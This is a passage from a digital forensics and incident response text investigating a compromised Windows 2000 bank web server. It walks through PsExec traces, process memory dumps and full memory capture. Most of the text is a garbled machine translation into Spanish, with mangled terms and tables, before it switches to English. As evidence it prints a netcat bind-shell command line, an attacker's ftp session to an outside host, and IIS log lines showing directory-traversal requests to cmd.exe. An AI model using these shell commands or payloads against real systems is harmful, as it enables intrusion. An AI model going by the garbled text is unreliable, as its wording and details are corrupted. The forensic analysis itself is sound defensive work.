ejecutando PsExec nos dice mucho acerca de esta intrusin. En primer lugar, PsExec slo abrir un canal si la oferta adecuada de nivel de administrador credenciales. Por lo tanto, el atacante tiene un

administrador de nivel de contrasea. En segundo lugar, el atacante sabe de una JBR de contraseas, contrasea, y que pueden trabajar en otras mquinas en toda la empresa JBR. En tercer lugar, el atacante debe estar ejecutando un sistema de Microsoft Windows en su mquina para atacar a ejecutar PsExec. Tambin vemos que el atacante se est ejecutando el comando ftp. Una de las primeras cosas que los atacantes suelen hacer cuando el acceso a un sistema de transferencia de sus herramientas a la mquina vctima. Tal vez este proceso es parte de la metodologa estndar de los hackers. Tambin vemos nc, que vamos a averiguar es netcat, iroffer y, un programa discutido previamente. Las tres ltimas lneas son parte de nuestro proceso de respuesta en vivo, y que espera para verlos. Este proceso lista se utilizar de nuevo cuando adquirimos volcados de memoria de los renegados procesos descubrimos en esta seccin. SERVICIOS EJECUTADOS Vimos en la ltima seccin que haba un proceso en ejecucin con el nombre PSEXECSVC. "SVC" probablemente est de servicio. Podemos obtener fcilmente una lista de servicios con el PsService ejecutable distribuido en la PsTools suite. La herramienta se ejecuta sin la lnea de comandos argumentos para obtener los datos que necesitamos. Los resultados completos de este comando no se enumeran aqu porque son largos, pero la plena produccin se puede encontrar en su DVD. El nico servicio que captura nuestra atencin es la siguiente:
PsService v1.01 Copyright Sysinternals SERVICE_NAME: DISPLAY_NAME: (null) - local y (C) remota 2001 de servicios espectador / controlador Marcos Russinovich http://www.sysinternals.com PSEXESVC PSEXESVC

TIPO: 10 WIN32_OWN_PROCESS ESTADO: 4 DE FUNCIONAMIENTO (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE: 0 (0x0) SERVICE_EXIT_CODE: 0 (0x0) El CHECKPOINT: 0x0 WAIT_HINT: 0x0

Los dems servicios son claramente los servicios de Microsoft Windows, y que contienen descripciones vlidas acerca de sus efectos. Este servicio no tiene una descripcin. La (nula) es una descripcin que normalmente se colocado. Podemos ver que este servicio se est ejecutando, y con un poco de investigacin en la Internet, nos encontramos con informacin que vincule PSEXECSVC a la

PsExec herramienta. Es importante sealar que, incluso si la herramienta se PsExec llamarse, nos seguimos viendo este servicio en el servicio de listado. Los servicios son importantes para nosotros porque un atacante puede ocultar programas en ellos. Si Psservice examinar la produccin, vers que es larga. Un servicio extra en la lista es fcil para un investigador a perder. Adems, a diferencia de los procesos en general, los servicios pueden verse obligados a poner en marcha en el reinicio del sistema. Hemos examinado muchas intrusiones en la vida real que utilizan la tcnica a partir de puertas traseras, servidores FTP, y mucho ms usando Firedaemon. Firedaemon hace que cualquier proceso de un servicio y permite a la fuerza en su inicio se reinicia. Empleo previsto Los atacantes con acceso administrativo puede programar puestos de trabajo. Esto permitir a un atacante ejecutar comandos cuando ni siquiera est en la caja. Por ejemplo, un atacante puede querer a un calendario de trabajo que se abre una puerta trasera cada noche a las 2 a.m.. De esta forma, su puerto habitual de seguridad exploraciones no recoger a la puerta de atrs durante las horas de trabajo. Al escribir en el, vemos los siguientes puestos de trabajo prevista para el JBRWWW: No hay entradas en la lista. Por lo tanto, no tienen que preocuparse por ese tipo de actividad durante la presente investigacin. Abrir archivos Al examinar la lista de archivos abiertos, somos capaces de determinar la informacin ms pertinente para nuestra investigacin. La suite contiene PsTools otra herramienta que podemos utilizar para recuperar esta informacin. El nombre del programa es Psfile. Cuando corremos Psfile en JBRWWW, recibimos los siguientes resultados: PsFile v1.01 - local y remota de archivos de red Lister Copyright (C) 2001 Marcos Russinovich Sysinternals http://www.sysinternals.com Los archivos abiertos de forma remota JBRWWW: [100] \ PIPE \ psexecsvc Usuario: ADMINISTRADOR Bloqueos: 0 Acceso: lectura / escritura [101] \ PIPE \ psexecsvc-Caine-2936-stdin Usuario: ADMINISTRADOR Bloqueos: 0 Acceso: Escribir

[102]

PIPE \ psexecsvc-Caine-2936-stdout Usuario: ADMINISTRADOR Bloqueos: 0 Acceso: Leer [103] \ PIPE \ psexecsvc-Caine-2936-stderr Usuario: ADMINISTRADOR Bloqueos: 0 Acceso: Leer Vemos que los informes Psfile un sistema de tubera abierto por PSEXECSVC. Ahora vemos la palabra Caine. Si se han familiarizado con PsExec y Psfile, usted sabra que Caine es el nombre NetBIOS del equipo que conectado a JBRWWW utilizando PsExec. Si furamos capaces de aprovechar un potencial atacante del equipo, que podra querer para buscar esta palabra clave. Vamos a hablar de bsqueda de palabras clave ms adelante en este libro cuando hablamos de anlisis forense duplicaciones. Proceso de volcados de memoria Hemos visto que el atacante inici los procesos de renegados JBRWWW, todava no sabemos muy bien qu es exactamente lo que el atacante corri. A travs de la experiencia anterior forense, podemos hacer conjeturas, como lo hicimos en el caso del perodo de sesiones netcat obligado a ser un smbolo del sistema, pero necesitamos una buena manera de saber con certeza. Para ayudarnos a lograr esto, vamos a capturar el espacio de memoria del sospechoso procesos. Tradicionalmente, la respuesta a incidentes y los investigadores forenses rara vez recoger el espacio de memoria utilizados por los sospechosos de los procesos de los sistemas Windows. Esto se debe principalmente a la falta de mtodos documentados, las tcnicas y herramientas para este proceso. La naturaleza del sistema operativo, junto con sus correspondientes restricciones impuestas sobre las zonas protegidas de memoria, hace que la adquisicin de la memoria y el anlisis complejo y problemtico. Sin embargo, por varias razones, no menos de la que es la creciente sofisticacin de las herramientas de intrusin y tcnicas, la adquisicin y el procesamiento de la solicitud y la memoria del sistema puede ser de suma importancia. Esa memoria puede proporcionar estructuras de investigacin crtica y material probatorio de una naturaleza voltil de datos que pueden perderse cuando el sistema se apaga para llevar a cabo una duplicacin forense tradicional. Ejemplos de los tipos de datos que se pueden incluir prdida de la lnea de comandos utilizados por el intruso para ejecutar un proceso de la picaresca, la consola de ejecucin remota de comandos y su consiguiente salida, claro contraseas de texto, y sin encriptar los

datos. Aunque no vamos a entrar en detalles sobre la estructura, organizacin y gestin de la memoria en estos sistemas operativos, se recomienda tener un conocimiento de ellos para facilitar el examen de la memoria capturado. Una excelente referencia est dentro de Windows 2000, tercera edicin, por Salomn David y Mark Russinovich. Microsoft proporciona una utilidad llamada Userdump.exe para la familia Windows NT de sistemas operativos que nos permite captar el espacio de memoria utilizados por cualquier proceso de ejecucin. Esta herramienta es un componente de Microsoft OEM paquete de herramientas de soporte disponible en http://download.microsoft.com/download/win2000srv/Utility/3 .0/NT45/EN-US/Oem3sr2.zip Porque escribe userdump el proceso extrado de la memoria en el disco, no podemos utilizar nuestros perodos de sesiones netcat para transferir los datos directamente. Queremos tener un pequeo impacto posible sobre el sospechoso sistema, de modo que antes de ejecutar comandos userdump, que escribir archivos de gran tamao para el sospechoso del sistema de disco duro (posiblemente la supresin de material de valor probatorio en el espacio no asignado), se mapa un recurso compartido de red directamente a nuestro sistema forense. En este caso, se asigna una parte de nuestro sistema forense como unidad Z: utilizando el siguiente comando: C: \> net use Z: \ \ 103.98.91.200 \ data El comando se ha completado correctamente. Ahora que tenemos una red de acceso de rea de almacenamiento establecido en nuestro trabajo forense, se puede familiarizar con nosotros mismos userdump. Cuando ejecutamos Userdump.exe sin opciones de lnea de comandos, ayudar a los usuarios se muestra: Modo de usuario Proceso de Dumper (versin 3.0) Copyright (c) 1999 Microsoft Corp Todos los derechos reservados. userdump-p Muestra una lista de procesos que se estn ejecutando y el proceso de IDs.userdump [-k] <ProcessSpec> [<TargetDumpFile>] Vuelca un proceso o procesos que comparten una imagen de nombre de archivo binario. -k, opcionalmente, los procesos de causas que deben ser sacrificados despus de haber sido objeto de dumping. <ProcessSpec> Es un decimal o el prefijo 0x-hexadecimal proceso de ID, o el nombre base y la extensin (no hay camino) de la

imagen

archivo utilizado para crear un proceso. <TargetDumpFile> Legal es una especificacin de archivo Win32. Si no se especifica, volcado de archivos se generan en el directorio actual usando un nombre basado en el nombre del archivo de imagen. userdump-m [-k] <ProcessSpec> [<ProcessSpec> ...] [-d <TargetDumpPath>] Igual que el anterior, excepto los vertederos mltiples procesos. -d los <TargetDumpPath> suministros directorio en el que los vertederos se van. El valor por defecto es el directorio actual. userdump-g [-k] [-d <TargetDumpPath>] Similar a la anterior, excepto los vertederos aplicaciones Win32 GUI que parecen colgar. Tenga en cuenta que userdump tiene varias opciones tiles, en la captura de mltiples procesos en una sola lnea de comandos y ver los procesos que se estn ejecutando. Para ejecutar el userdump un proceso nico sospechoso, simplemente la oferta con un ID de proceso (PID) que hemos obtenido a partir de la primera pslist mando y un destino. Para guardar el atacante del netcat perodo de sesiones (PID 1424) asignada a nuestro disco duro en Z:, que ejecuta el siguiente comando: userdump 1424 Z: \ nc_1424.dmp Modo de usuario Proceso de Dumper (versin 3.0) Copyright (c) 1999 Microsoft Corp Todos los derechos reservados. Proceso de dumping 1424 (nc.exe) a Z: \ nc_1424.dmp ... El proceso fue objeto de dumping con xito. Hemos adquirido el proceso de volcados de memoria para los procesos 1092, 1160, 1272, 1468, 1372, 1224, 1424, y 892 y la consiguiente coloca los archivos en su DVD de pruebas. Ahora que tenemos la sospecha de la aplicacin archivos de volcado de memoria, podemos realizar un examen inicial con Dumpchk.exe, una utilidad siempre como un componente de las herramientas de depuracin para Windows, que estn disponibles en http://www.microsoft.com/whdc / DDK / depuracin / default.mspx. Varias de las utilidades distribuidas como parte de este paquete, que puede facilitar el anlisis avanzado de los procesos de captura de memoria tales como el ncleo y en modo de usuario depuradores, podr exigir los smbolos del sistema operativo Windows que fueron la fuente de volcado de memoria. Estos smbolos y la informacin sobre su utilizacin estn disponibles en

de

http://www.microsoft.com/whdc/ddk/debugging/symbols.mspx. Dumpchk La utilidad es en realidad diseado para validar un volcado de memoria, sin embargo, s proporciona informacin valiosa. En nuestro trabajo forense, hemos ejecutado Dumpchk.exe para examinar el proceso de volcado de memoria de los presuntos netcat proceso: D: \ Dumpchk nc_1424.dmp Microsoft (R) Windows, versin 6.2.0013.1 Depurador Copyright (c) Microsoft Corporation. Todos los derechos reservados. Carga de volcado de archivos [nc_1424.dmp] Archivo de volcado de usuario: Slo los datos de las aplicaciones est disponible Windows 2000, versin 2195 gratis x86 compatible Producto: WinNT [porciones eliminado a la brevedad] Windows 2000, versin 2195 gratis x86 compatible Producto: WinNT Kernel32.dll versin: 5.00.2191.1 PEB en 7FFDF000 InheritedAddressSpace: No ReadImageFileExecOptions: No BeingDebugged: No ImageBaseAddress: 00400000 Ldr.Initialized: S Ldr.InInitializationOrderModuleList: 131f38. 13b470 Ldr.InLoadOrderModuleList: 131ec0. 13b460 Ldr.InMemoryOrderModuleList: 131ec8. 13b468 Mdulo de Base de hora 400000 34d74d22 febrero 03 12:00:18 1998 C: \ WINNT \ system32 \ OS2 \ dll \ nc.exe 77f80000 38175b30 octubre 27 15:06:08 1999 C: \ WINNT \ System32 \ ntdll.dll 77e80000 3844d034 diciembre 01 02:37:24 1999 C: \ WINNT \ system32 \ KERNEL32.DLL 75050000 3843995d noviembre 30 04:31:09 1999 C: \ WINNT \ System32 \ wsock32.dll 75030000 3843995d noviembre 30 04:31:09 1999 C: \ WINNT \ System32 \ Ws2_32.dll 78000000 37f2c227 Sep 29 20:51:35 1999 C: \ WINNT \ system32 \ MSVCRT.DLL 77db0000 3844d034 diciembre 01 02:37:24 1999 C: \ WINNT \ system32 \ Advapi32.dll 77d40000 384700c2 diciembre 02 18:29:06 1999 C: \ WINNT \ system32 \ Rpcrt4.dll 75020000 3843995d noviembre 30 04:31:09 1999 C: \ WINNT \ System32 \ WS2HELP.DLL 74fd0000 3843995d noviembre 30 04:31:09 1999 C: \ WINNT \ system32 \ msafd.dll

77e10000 3844d034 diciembre 01 02:37:24 1999 C: \ \ system32 \ user32.dll 77f40000 382bd384 noviembre 12 03:44:52 1999 C: \ WINNT \ system32 \ Gdi32.dll 75010000 3843995d noviembre 30 04:31:09 1999 C: \ WINNT \ System32 \ wshtcpip.dll SubSystemData: 0 ProcessHeap: 130000 ProcessParameters: 20000 WindowTitle: "nc-d-L-n-p 60906-e cmd.exe ' Archivo_de_imagen: 'C: \ WINNT \ system32 \ OS2 \ dll \ nc.exe " WINNT
CommandLine: "nc-d-L-n-p 60906-e cmd.exe ' DllPath: 'C: \ WINNT \ system32 \ OS2 \ dll;.; C: \ WINNT \ System32; C: \ winnt \ system, C: \ WINNT; C: \ WINNT \ system32; C: \ WINNT; C: \ WINNT \ System32 \ Wbem " Medio Ambiente: 0x10000 Finalizado volcado de verificacin El resultado confirma el nombre del archivo y la ubicacin y proporciona una lista de asociados biblioteca de vnculos dinmicos con los archivos a lo largo de la hora y la lnea de comandos utilizados para iniciar el proceso de netcat. Si est familiarizado con netcat, la lnea de comandos en negrita en este ejemplo debe ser familiar. Indica que netcat fue configurado para separar de la consola, escuchar en el puerto 60906, y ejecutar un shell de comandos cuando se produjo una conexin. Este voltil de datos se hubieran perdido si el proceso de la memoria no era capturado, y que simplemente no estara disponible si el examinado capturados nc.exe binario por s solo. Afecta con Dumpchk examen revel que el PID 1224 se inici con una lnea de comandos de iroffer myconfig, y PID 1372 con ftp 95.208.123.64.

Ahora podemos examinar los volcados de memoria para informacin adicional mediante la bsqueda a travs de la contigua cadenas ASCII que estn incrustados dentro. Debido a los datos almacenados por una aplicacin o proceso en la memoria pueden estar en formato Unicode, es necesario utilizar un Unicode versin de Windows capaz de las cadenas de mando. Uno est disponible en http://www.sysinternals.com/ntw2k/source/misc.shtml, que muestra Unicode y ASCII estndar por defecto. Las cadenas de comando de Linux no muestra las cadenas Unicode por defecto, as que si usted est usando esto como una plataforma de procesamiento de forenses, asegrese de que usted active esta opcin. Ejecucin de cadenas en el nc_1424 de volcado de memoria, usted ver de inmediato el entorno de aplicaciones, que proporciona, entre otras cosas, el nombre del equipo, la ruta del sistema, la ubicacin en el sistema de archivos de la aplicacin de ejecucin, y la lnea de comandos

utilizados: cadenas nc_1424.dmp Cuerdas v2.1 Copyright (C) 1999-2003 Marcos Russinovich Sistemas Internos http://www.sysinternals.com g = C: = C: \ WINNT \ system32 \ OS2 \ dll ALLUSERSPROFILE = C: \ Documents and Settings \ All Users CommonProgramFiles = C: \ Program Files \ Common Files COMPUTERNAME = JBRWWW ComSpec = C: \ WINNT \ system32 \ cmd.exe NUMBER_OF_PROCESSORS = 1 OS = Windows_NT Os2LibPath = C: \ WINNT \ system32 \ OS2 \ dll; Path = C: \ WINNT \ system32; C: \ WINNT; C: \ WINNT \ System32 \ Wbem PATHEXT =. COM;. EXE;. BAT;. CMD;. VBS;. VBE;. JS;. JSE;. FSM;. WSH PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Familia 6 Modelo 6 Stepping 5, GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION = 0605 ProgramFiles = C: \ Archivos de programa PROMPT = $ P $ G SystemDrive = C: SystemRoot = C: \ WINNT TEMP = C: \ WINNT \ TEMP TMP = C: \ WINNT \ TEMP USERPROFILE = C: \ Documents and Settings \ Default User windir = C: \ WINNT C: \ WINNT \ system32 \ OS2 \ dll \ C: \ WINNT \ system32 \ OS2 \ dll;.; C: \ WINNT \ System32; C: \ winnt \ system, C: \ WINNT; C: \ WINNT \ system32; C: \ WINNT; C: \ WINNT \ System32 \ Wbem C: \ WINNT \ system32 \ OS2 \ dll \ nc.exe nc-d-L-n-p 60906-e cmd.exe Otras cadenas se encuentra al examinar los archivos capturados de memoria incluyen los siguientes: *** *** es.c: *** *** Trace *** *** ies.c: *** *** XDCC Guardar Autosave: lista de 328 XDCC Autosave: Guardar lista de -1 mainloop src XDCC Autosave: Guardar lista de 328 XDCC Autosave: Guardar lista de Guardando ... ignorados ... 0.000000 Guardando ... ignorados ... / iroffer.c Usted Guardando ... ignorados ... 0.000000 Guardando ... ignorados ... Hecho Hecho Hecho Hecho A | Hecho Hecho Hecho Hecho

Trace -1 mainloop src / iroffer.c W ( ' iroffer myconfig C: \ WINNT \ System32 \ cmd.exe - iroffer myconfig CygwinWndClass IR> 23 archivo (s) 1.739.715 octetos Y NCN 2 Dir (s) 3.451.928.576 bytes libres C: \ WHATSNEW C: \ WINNT \ system32 \ OS2 \ dll \ iroffer.exe iroffer myconfig 2 Dir (s) 3.451.928.576 bytes libres C: \ WINNT \ system32 \ ftp.exe ftp 95.208.123.64 jbrwww jbrbank.com xUSER ftp UH < Usuario (95.208.123.64: (ninguno)): xl " Contrasea: FTP. control rator (95.208.123.64: (ninguno)): Si bien no hay nada aqu la tierra es estremecedor, no proporcionar la informacin que apoya el anlisis. En los siguientes captulos, ver una situacin en la que el proceso de examen de la memoria desempea un papel fundamental. Hemos adquirido el proceso de volcados de memoria para los siguientes procesos y los pusieron en evidencia su DVD: 1092, 1160, 1272, 1468, 1372, 1224, 1424, y 892. Completo sistema de volcados de memoria Ahora tenemos la aplicacin de memoria del sospechoso procesos, pero tambin queremos capturar a todos los de la memoria del sistema, lo que puede haber restos de otros procesos de intruso o perodos de sesiones anteriores. Podemos obtener usando un programa que probablemente ya estn familiarizados con-dd. George M. Garner, Jr dd ha modificado, junto con varias otras utilidades de inters, especficamente para la investigacin forense. Mejoras incluyen built-in md5sum, la compresin, la capacidad y la explotacin forestal, por nombrar unos pocos. Al incorporar estas opciones utilizadas con frecuencia que normalmente se asocia con distintos comandos, que reduce significativamente el I / O,

aumentando as la velocidad de adquisicin. Para obtener ms informacin, y para descargar sus herramientas, vaya a su Forense Adquisicin de Servicios Pblicos en la pgina http://users.erols.com/gmgarner/forensics. Algunos de los servicios pblicos de la Garner se basan en la UnxUtils distribucin, que ofrece una gran variedad de tiles utilidades GNU. El UnxUtils estn disponibles en http://unxutils.sourceforge.net. Al utilizar el / dev / kmem archivo en sistemas Unix, podemos obtener una vista lgica de la memoria fsica de vivir un sistema operativo tipo Unix. Por desgracia, Windows NT sistemas operativos no proporcionan un archivo de tal objeto, pero Garner la versin de uno dd crea / Dispositivo / PhysicalMemory seccin objeto. Una seccin de objetos, tambin llamado un archivo de mapeo objeto-, representa un bloque de memoria que dos o ms procesos pueden compartir, y puede ser asignada a una pgina o de otro tipo de archivo en archivo de disco. Mediante la cartografa de las / Dispositivo / PhysicalMemory la seccin objeto de espacio de direcciones virtuales, Garner la versin de dd nos permite generar un volcado de memoria del sistema que representan. Sr Garner utilizando la versin de dd, utilizamos la siguiente lnea de comandos para capturar la memoria del sistema: D: \> dd.exe if = \ \. \ Physicalmemory de = z: \ JBRWWW_full_memory_dump.dd bs = 4096 Adquisicin de Servicios Forenses, 3, 16, 2, 1030 dd, 1, 0, 0, 1030 Copyright (C) 2002 George M. Garner Jr Lnea de comandos: dd.exe if = \ \. \ Physicalmemory de = z: \ JBRWWW_full_memory_dump.dd bs = 4096 Sobre la base de la versin original desarrollada por Paul Rubin, David MacKenzie, y Stuart Kemp Microsoft Windows: la versin 5.0 (Build 2195.Professional) 02/10/2003 02:41:01 (UTC) 01/10/2003 22:41:01 (hora local) Actualidad Usuario: JBRWWW \ Administrator Total de memoria fsica inform: 129260 KB Copia de la memoria fsica ... E: \ dd.exe: Dej de leer la memoria fsica: El parmetro es incorrecto. Salida z: \ JBRWWW_full_memory_dump.dd 129260/129260 Kbytes Esta memoria la imagen, el nombre JBRWWW_full_memory_dump.dd, es en las pruebas de DVD para

su revisin. A pesar de que no hacerlo en este caso, tambin puede utilizar esta versin de dd para obtener una imagen de todo el disco duro fsico de la presentacin en vivo del sistema sin necesidad de apagar, reiniciar, o interrupcin del servicio. Para lograr esto, habra utilizado la lnea de comandos siguiente: D: \> dd.exe if = \ \. \ Physicaldrive0 de = z: \ JBRWWW_physicaldrive0.dd bs = 4096 Durante un examen, las cadenas de mando revel varias piezas de informacin relativa a la intrusin de respuesta. Los siguientes son algunos de los comandos ejecutados el atacante durante la intrusin. Parece que el intruso se pinged a 95.208.123.64, que se inici un comando ipconfig / all, que se inici un perodo de sesiones FTP, y ejecutado iroffer.exe: Estadsticas de ping para 95.208.123.64: Paquetes: enviados = 2, recibidos = 2, perdidos = 0 (0% perdidos), Aproximada de veces ida y vuelta en milisegundos: Mnimo = 0ms, Mximo = 0ms, Media = 0ms <g 95.208.123.64 ipconfig / all T \ System32 \ cmd.exe ping 95,16 <g 95.208.123.64 cmd.exe ipconfig.exe ftp.exe iroffer.exe ystemRoot% \ System32 \ cmd.exe <c: \ cd .. Esta es la salida de un comando ipconfig / all extrados de la memoria del sistema el archivo: Windows 2000 configuracin IP Nombre de host. . . . . . . . . . . . : Jbrwww Sufijo DNS principal. . . . . . . : Tipo de nodo. . . . . . . . . . . . Emitida Enrutamiento IP habilitado. . . . . . . . : No WINS proxy activado. . . . . . . . : No Sufijo DNS lista de bsqueda. . . . . . : Jbrbank.com Adaptador Ethernet Conexin de rea local: De conexin especfica DNS sufijo. : Jbrbank.com Descripcin. . . . . . . . . . . : 3Com 3C920 integrada Fast Ethernet (3C905C-TX Compatible) Direccin fsica. . . . . . . . . : 00-C0-4F-1C-10-2B

DHCP habilitado. . . . . . . . . . . : S Automtica habilitada. . . . : S Direccin IP. . . . . . . . . . . . : 103.98.91.41 Mscara de subred. . . . . . . . . . . : 255.255.255.0 Puerta de enlace predeterminada. . . . . . . . . : 103.98.91.1 DHCP Server. . . . . . . . . . . : 103.98.91.1 Servidores DNS. . . . . . . . . . . : 103.98.91.1 Arrendamiento obtenidos. . . . . . . . . . : Sbado, agosto 23, 2003 3:55:31 PM Vence el arrendamiento. . . . . . . . . . : T = 1.0 Esta parece ser una iroffer ventana de estado, lo que puede mostrar archivos de la intruso "que ofrece" a cabo. XDCC Autosave: Guardando ... Hecho -> Guardar lista de ignorados ... Hecho (159K) -> AUTOEXEC.BAT (0K) -> Boot.ini (0K) -> CONFIG.SYS (0K) -> Documents and Settings (4K) -> Inetpub (4K) -> IO.SYS (0K) -> Msdos.sys (0K) -> NTDETECT.COM (33K) -> Ntldr (209K) -> Pagefile.sys (209K) -> Archivos de programa (4K) -> System Volume Information (0K) -> Update.exe (0K) -> WINNT (24K) -> 16 Total Archivos -> ADMIN LISTUL Pidi (DCC Chat) Durante el examen de la memoria del sistema, encontramos varias secciones de registros de IIS. En la siguiente seccin, el xito de Unicode explotar lanzado desde 95.16.3.79 fue encontrado en la memoria del sistema. # Software: Microsoft Internet Information Server 5.0 # Version: 1.0 # Fecha: 2003-10-01 22:58:53 # Campos: la hora c-ip cs-method cs-uri-stem sc-estado 22:58:53 95.208.123.64 GET / NULL.printer 404 23:00:55 95.208.123.64 HEAD / Iisstart.asp 200 23:01:18 95.16.3.79 GET / Iisstart.asp 200 23:01:18 95.16.3.79 GET / pagerror.gif 200 23:01:18 95.16.3.79 GET / favicon.ico 404 23:03:23 95.208.123.64 GET / NULL.printer 404 23:08:45 95.16.3.79 GET / NULL.printer 404 23:15:09 95.208.123.64 OPCIONES / 200 23:16:30 95.208.123.64 OPCIONES / 200

23:16:30 95.208.123.64 PROPFIND / ADMIN $ 404 23:17:04 95.16.3.79 GET / scripts/../../../../winnt/system32/cmd.exe 200 23:17:54 95.16.3.79 GET / scripts/../../../../winnt/system32/cmd.exe 502 23:20:19 95.16.3.79 GET / scripts / ..% 5C% 5C .. .. 5c../winnt/system32/cmd.exe 200% 23:32:43 95.208.123.64 OPCIONES / 200 23:32:43 95.208.123.64 PROPFIND / ADMIN $ 404 23:33:52 95.208.123.64 PROPFIND / ADMIN $ 404 23:58:16 95.208.123.64 OPCIONES / 200 23:58:16 95.208.123.64 PROPFIND / ADMIN $ 404 Si el intruso haba suprimido los archivos de registro en el disco duro, esta volatilidad de los datos pueden haber desempeado un papel fundamental en la determinacin de cmo, cundo y dnde fue la intrusin initiated.Analyzing no voltil de datos Nos gustara obtener varias piezas clave de la informacin, mientras que la mquina est an en marcha. El tipo de datos vamos a discutir en esta seccin es no voltil. Esto significa que tambin podra recuperar esta informacin de una duplicacin forense si as lo desean, pero que la opcin puede ser difcil o imposible. Parte de la informacin que desea adquirir es la siguiente: Versin Sistema Registro La Una Sistema Cuentas IIS Archivos poltica historia de de los registros de Logs sospechosos del de sistema archivos de de inicios de usuario y de nivel hora datos auditora de sesin sucesos de y parche fecha

Vamos a abordar cada uno de los conjuntos de datos en su propia subseccin y analizar los datos recopilados a partir de JBRWWW. Versin del sistema y nivel de parche Si usted no ha figurado que por ahora, una investigacin puede ser tediosa, ya veces es difcil saber por dnde

empezar. Uno de los hechos importantes que podemos aprender acerca de JBRWWW es su versin del sistema operativo y parches de seguridad que se han instalado. Sabiendo que los parches se han aplicado al servidor nos permitir reducir nuestra investigacin inicial a las zonas de alta probabilidad. Esto no quiere decir que un intruso no intenta instalar un parche para cubrir los medios de ataque, mantener su acceso a la mquina, y disuadir a otros intrusos. Un programa en nuestra caja de herramientas denominada PsInfo, distribuidos de la suite en PsTools http://www.sysinternals.com, nos permitir la consulta JBRWWW para su sistema de informacin. El sistema de informacin que produce PsInfo nos permitir ver los parches que se han aplicado. PsInfo is run with the following command, where -h is used to show installed hotfixes, -s is used to show installed software, and -d is used to show disk volume information: psinfo h s -d PsInfo provides the following results. We have bolded the important pieces of information: PsInfo 1.34 - local and remote system information viewer Copyright (C) 2001-2002 Mark Russinovich Sysinternals http://www.sysinternals.com Querying information for JBRHTTP://WWW... System information for \\JBRWWW: Uptime: 39 days, 6 hours, 27 minutes, 42 seconds Kernel version: Microsoft Windows 2000, Uniprocessor Free Product type: Professional Product version: 5.0 Service pack: 0 Kernel build number: 2195 Registered organization: JBR Bank Registered owner: JBR Bank Install date: 8/23/2003, 12:46:00 PM IE version: 5.0100 System root: C:\WINNT Processors: 1 Processor speed: 435 MHz Processor type: Intel Pentium II or Celeron Physical memory: 126 MB Volume Type Format Label Size Free Free A: Removable 0% C: Fixed NTFS 4.0 GB 3.2 GB 80% D: CD-ROM CDFS CDROM 272.8 MB 0% OS Hot Fix Installed Q147222 8/23/2003 Applications: WebFldrs 9.00.3501 We see that only one hotfix (Q147222) has been applied. The

named hotfix addresses the Exchange server, the mail server for Microsoft Windows. Doing a little research on http://www.securityfocus.com, we see that JBRWWW is vulnerable to a multitude of attacks, including the "Unicode" (Bugtraq ID #1806) and "Double Decode" (Bugtraq ID #2708) attacks. Because these are both Web server attacks and JBRWWW is running a Web server (as we saw in the netstat and FPort output), we need to acquire the Web server logs to see whether the intruder gained access through the Web server. We will discuss the commands to do this in a later section in this chapter. File System Time and Date Stamps Most investigators will use the dir command to capture the file time and date stamps, but we recommend a better tool. The standard dir command produces output that is cumbersome and that cannot easily be imported into a spreadsheet so that we may sort on different attributes of the data. In the UnxUtils package, available from unxutils.sourceforge.net, you will find a command called find. If you are already familiar with Cygwin, you can also use the find utility from that tool set (this is what we used in our response). This command will print, one line for each file, any of the files attributes we desire. Therefore, with the following command, we can print the file permissions, last access date, last access time, modification date, modification time, created date, created time, user ownership, group ownership, file size, and the full path of every file on the C: drive: find c:\ -printf "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;%s;%p\n" Notice that with the find command, we are delimiting each of the attributes with a semicolon. This will enable us to import it into our favorite spreadsheet. After we import this data, we can perform sorts for file pathname. Because we already know that C:\WINNT\sytem32\os2\dll is a path where the attacker left his tools, we will examine that directory in Table 1-1: Table 1-1 Created Suspicious Created File File 08\23\2003 8:14:18 0 c:\WINNT\system32\os2 Files Discovered Date Time Size Name on JBRWWW

08\23\2003 8:14:18 8192 c:\WINNT\system32\os2\dll 10\01\2003 19:25:07 13929 c:\WINNT\system32\os2\dll\Configure 10\01\2003 19:25:07 15427 c:\WINNT\system32\os2\dll\COPYING 10\01\2003 19:25:07 68016 c:\WINNT\system32\os2\dll\cygregex.dll 10\01\2003 19:25:07 971080 c:\WINNT\system32\os2\dll\cygwin1.dll 12\07\1999 7:00:00 12646 c:\WINNT\system32\os2\dll\doscalls.dll 10\01\2003 19:25:08 902 c:\WINNT\system32\os2\dll\iroffer.cron 10\01\2003 19:25:08 213300 c:\WINNT\system32\os2\dll\iroffer.exe 10\01\2003 19:25:09 2924 c:\WINNT\system32\os2\dll\Makefile.config 10\01\2003 19:25:09 0 c:\WINNT\system32\os2\dll\mybot.ignl 10\01\2003

19:25:09 0 c:\WINNT\system32\os2\dll\mybot.ignl.bkup 10\01\2003 19:25:09 4 c:\WINNT\system32\os2\dll\mybot.ignl.tmp 10\01\2003 19:25:09 25774 c:\WINNT\system32\os2\dll\mybot.log 10\01\2003 19:25:09 168 c:\WINNT\system32\os2\dll\mybot.msg 10\01\2003 19:25:09 5 c:\WINNT\system32\os2\dll\mybot.pid 10\01\2003 22:26:23 49 c:\WINNT\system32\os2\dll\mybot.xdcc 10\01\2003 21:56:22 49 c:\WINNT\system32\os2\dll\mybot.xdcc.bkup 10\01\2003 22:26:23 233 c:\WINNT\system32\os2\dll\mybot.xdcc.txt 10\01\2003 19:25:09 19792 c:\WINNT\system32\os2\dll\myconfig 10\01\2003 19:24:37 120320 c:\WINNT\system32\os2\dll\nc.exe 12\07\1999 7:00:00

247860 c:\WINNT\system32\os2\dll\netapi.dll 10\01\2003 19:25:09 5080 c:\WINNT\system32\os2\dll\README 10\01\2003 19:55:51 36864 c:\WINNT\system32\os2\dll\samdump.dll 10\01\2003 19:25:09 19767 c:\WINNT\system32\os2\dll\sample.config 10\01\2003 19:55:42 32768 c:\WINNT\system32\os2\dll\setup.exe 10\01\2003 19:58:38 342 c:\WINNT\system32\os2\dll\temp.txt 10\01\2003 19:52:44 122880 c:\WINNT\system32\os2\dll\update.exe 10\01\2003 19:25:10 16735 c:\WINNT\system32\os2\dll\WHATSNEW 12\07\1999 7:00:00 108095 c:\WINNT\system32\os2\oso001.009

We see that most of the tools were created during the evening of 10\01\2003. If we do a sort on the file metadata by creation time and date stamps, we see that all these files were created approximately at the same time, as in Table 1-2:

Table 1-2 Created

Files

Created Created File File

During the Date

Attack Time Size Name

on

JBRWWW

